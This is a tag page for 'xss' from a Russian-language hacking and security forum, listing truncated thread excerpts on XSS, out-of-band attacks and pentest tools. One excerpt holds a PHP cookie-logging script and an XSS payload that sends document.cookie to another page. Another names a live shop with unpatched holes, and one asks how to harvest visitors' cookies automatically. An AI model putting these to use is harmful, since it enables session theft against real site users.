xss

  1. g00db0y

    Статья Out-of-band атаки

    В этой статье я расскажу о понятии и концепции "Out-of-band" (на рус. «вне-диапазона») , а также о использовании на некоторых примерах. Структура статьи 1. Что значит "Out-of-band"? 2. Blind уязвимости 2.1 Blind SQL Injection 2.2 Blind Command Injection 2.3 Blind Cross-site Scripting 3...
  2. P

    Книга Web-сервер глазами хакера. 2-е издание

    Рассмотрена система безопасности Web-серверов и типичные ошибки, совершаемые Web-разработчиками при написании сценариев на языках PHP, ASP и Perl. Приведены примеры взлома реальных Web-сайтов, имеющих уязвимости, в том числе и популярных. В теории и на практике рассмотрены распространенные...
  3. CYBRED

    Статья Поиск уязвимостей в интернет-магазине товаров от Xiaomi

    На сайте все еще не прикрыли уязвимости, так что вы сможете увидеть и потрогать их "вживую" - Фирменный интернет магазин Xiaomi в Севастополе и Крыму Mi-XX. Рассказываю я о них потому, что владелец не захотел нормально общаться, сначала заигнорив на почте, а потом и вовсе добавив меня в ЧС во...
  4. CYBRED

    Гостевая статья Сомнительное путешествие от XSS к RCE

    Как многие читающие, наверняка, знают, в середине апреля 2019 года была обнаружена уязвимость удаленного выполнения кода в клиенте EA Origin (CVE-2019-11354). О ней и некоторых других багах, @zer0pwn с другом @Daley решили рассказать на страницах своего блога. Отладка Origin Многие...
  5. GoodSmile

    Проблема XSS.is ворует наши премиум-статьи

    Добрый день. Решил взглянуть что там, на соседнем борде творится. Пролистал несколько страниц разных статей, и случайно увидел тему "Simple Botnet на C# — Часть 1". Эти статьи я писал еще где-то 5 месяцев назад. В теме есть все три части этой статьи. Как то не по себе, что наши премиум-статьи...
  6. A

    Проблема Возможно ли автоматизировать BeFF? ....или подскажите другой фреймворк.

    Поднял сайт. Возможно ли в автоматическом режиме получать все куки браузера посетителя сайта? Что то такое делает BeFF, но там все нужно делать ручками. А как автоматизировать - я что то не сообразил (. Есть ли подобное в Метасплойте? Или подскажите фреймворк для таких целей. По рассказам...
  7. CYBRED

    Статья Хитрости Unicode и эксплуатация XSS при лимите ввода длиной в 20 символов

    Межсайтовый скриптинг (XSS) - одна из самых распространенных уязвимостей, которую можно обнаружить чуть ли не на любом сайте в сети интернет (на некоторых, вроде Google и Amazon, придется хорошо поискать - в этих компаниях работают много разработчиков с большим опытом за плечами). Однако, иногда...
  8. Y

    Проблема Реализация CVE-2016-5682 Swager 2.0

    Есть api на Swager 2.0 Swagger UI как можно реализовать XSS атак и защиту? Пример реализации атаки R7-2016-19: Persistent XSS via Unescaped Parameters in Swagger-UI (CVE-2016-5682)
  9. Iskus

    XSS game от Google

    Всем салют, вот наткнулся сегодня случайно на игру от компании Google, которая позволяет потренировать свои навыки работы с приложениями, которые не достаточно качественно фильтруют пользовательский ввод, в следствии чего появляется возможность выполнения кода не предусмотренного логикой...
  10. R

    Решено Помощь с XSS

    Получается вот такой пэйлод, как избавиться от символа "]", чтобы всё отработало? <textarea name="subscribe"> my_payload - пользовательские данные:
  11. C

    International Bug Bounty Group

    We invite talented Russian hackers Telegram @ redco1234
  12. Vertigo

    Soft Тестируем ресурс с AngelSword

    Добрый день,Уважаемые Жители Форума,Друзья и Читатели. В эти выходные довелось провести тест одного ресурса. Как-то убежал из вида при этом интересный инструмент для проведения pentest. Восполняю пробел,так сказать. Создал софт Lucifer1993 - это мощная китайская школа пентеста. Несмотря на...
  13. The Codeby

    Статья Хакерские плагины для Chrome

    Это аналог статьи «Хакерские плагины для Firefox», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать. Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является Интернет-магазин Chrome. Пусть нас...
  14. F

    Решено XSS атака или подставное шоу на 2х миллионную аудиторию?

    Всем доброго времени суток! Еще давно наблюдал данный контент и как то было лень опровергать это, да и времени не было, а вот сейчас призадумался, не пи#%шь ли это? (сразу вспомнил шоу идиоты на карамба тв :D) Так вот суть: "Каратель шк" ищет на серверах (кс-го) школьников которые хотят обмануть...
  15. Doctor zlo

    Эксплуатация XSS

    Начал изучать xss. Сразу появился вопрос. Если ресурс уязвим к данной атаке, можно ли с помощью этой уязвимости, загрузить на атакуемый сервер payload и получить доступ к серверу?
  16. Vertigo

    Soft Kill Shot-Инструмент для тестирования на проникновение

    Добрый вечер,Уважаемые Форумчане и Друзья. Сегодня вам хочу представить интересный небольшой framework. Создателем этого замечательного инструмента является Bahaabdelwahed. Арабская школа пентеста. В killshot входят многие модули расположенные для удобства тестирования в подменю. Начинать...
  17. Tayrus

    Статья Получаем XSS на сайте через .docx файл

    Всякий раз, когда я вижу форму загрузки файла во время теста , я обращаю на это внимание. В лучшем случае я могу загрузить обратную оболочку(shell) на языке сценариев, доступном на веб-сервере. Если приложение работает например на PHP или ASP, это становится довольно легко. Если я не могу...
  18. P

    Для начального и глубокого освоения XSS атак с чего начать?

    Бодрый вечер, очень интересует тема xss уязвимостей, насколько я понял, для этого в изучении нужен в основном javascript или что то еще? Погуглив понял, что в основном все JS туторы созданы для фронт-енд(тот же UDEMY полон туторов для веба), может быть есть какая то особая прикладная область...
  19. Lisenok

    Статья Typo3. xss уязвимость расширения.

    Доброго времени суток господа и дамы. Сегодня опишу уязвимость найденную в расширение tt_news для typo3. Мы имеем typo3 версии 6.2.30 , расширение tt_news версии 3.6.0 (выделено красным). Так вот при создании новости на сайте, можно внедрить свой ява-скрипт код. Он отрабатывается и в поле...
  20. Tayrus

    Проблема Проблема с XSS

    Нашел на одном сайте XSS, решил сделать куки стилер создал файл в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location = '' + document.cookie;</ScRiPt> На сайте...